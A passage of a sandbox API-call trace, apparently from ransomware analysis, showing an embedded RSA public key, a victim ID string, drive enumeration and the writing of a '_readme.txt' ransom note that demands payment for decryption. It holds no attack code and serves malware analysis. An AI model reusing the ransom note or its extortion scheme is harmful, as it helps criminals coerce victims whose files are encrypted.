(HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d4ad0 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d4d38 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d4fa0 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33d5208 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e85c8 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e8830 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e8a98 [0225.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e8d00 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e8f68 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e91d0 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e9438 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e96a0 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e9908 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x33e9b70 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c16f0 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x67eb28 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbaa) returned 0x340d028 [0225.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x67eb28, cbMultiByte=-1, lpWideCharStr=0x340d028, cchWideChar=1493 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 470 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbb0) returned 0x692260 [0225.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340d028 | out: hHeap=0x620000) returned 1 [0225.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67eb28 | out: hHeap=0x620000) returned 1 [0225.779] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----" [0225.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x692260 | out: hHeap=0x620000) returned 1 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1760 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x340c3b8 [0225.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33c1760, cbMultiByte=-1, lpWideCharStr=0x340c3b8, cchWideChar=1064 | out: lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned 41 [0225.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x340d028 [0225.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340c3b8 | out: hHeap=0x620000) returned 1 [0225.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1760 | out: hHeap=0x620000) returned 1 [0225.779] lstrcpyW (in: lpString1=0x521cf0, lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0225.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340d028 | out: hHeap=0x620000) returned 1 [0225.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c16f0 | out: hHeap=0x620000) returned 1 [0225.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68b698 | out: hHeap=0x620000) returned 1 [0225.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340bff0 | out: hHeap=0x620000) returned 1 Thread: id = 148 os_tid = 0x5b4 [0226.669] timeGetTime () returned 0x113f283 [0226.669] GetLastError () returned 0x54f [0226.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x33dc9d8 [0226.669] GetCurrentThreadId () returned 0x5b4 [0226.670] SetLastError (dwErrCode=0x54f) [0226.670] Sleep (dwMilliseconds=0x0) [0226.673] Sleep (dwMilliseconds=0x3e8) [0228.361] GetLogicalDrives () returned 0x4 [0228.361] SetErrorMode (uMode=0x1) returned 0x0 [0228.361] PathFileExistsA (pszPath="C:\\") returned 1 [0228.361] SetErrorMode (uMode=0x0) returned 0x1 [0228.362] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0228.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x3b78058 [0228.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39afe60, cbMultiByte=-1, lpWideCharStr=0x3b78058, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0228.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8700 [0228.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.362] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.368] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.368] PathFindFileNameW (pszPath="") returned="" [0228.368] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.369] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.369] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.370] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x3b78058 [0228.378] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0228.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.378] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0228.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b78868 [0228.419] lstrcpyW (in: lpString1=0x3b78868, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" 